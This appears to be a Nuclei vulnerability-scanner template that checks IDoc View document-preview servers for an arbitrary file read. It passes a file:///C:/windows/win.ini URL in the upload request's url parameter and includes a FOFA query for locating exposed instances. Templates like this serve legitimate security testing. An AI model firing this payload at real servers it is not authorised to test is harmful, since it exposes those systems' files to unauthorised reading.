id: idocview-lfi

info:
  name: IDoc View - Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  metadata:
    verified: true
    max-request: 1
    fofa-query: title=="在线文档预览 - I Doc View"
  tags: idoc,lfi,file-read

variables:
  file: "{{to_lower(rand_text_alpha(5))}}"

http:

  - method: GET
    path:
      - "{{BaseURL}}/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name={{file}}.txt"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
          - contains_all(body, "ext", "srcUrl", "success", "md5")
        condition: and

    extractors:
      - type: regex
        part: body
        internal: true
        name: filepath
        group: 1
        regex:
          - '"srcUrl":"\/([a-z/0-9_.]+)"'
# digest: 490a0046304402203529d71ffaca13172d7c03b217771bb823c49b397ee5bc9d00b8e0ac9db0993402202b8c25f97a1466b82e48dbb1e952b709963c5faf6f806fadce6216d3098dfa4e:922c64590222798bb761d5b6d8e72950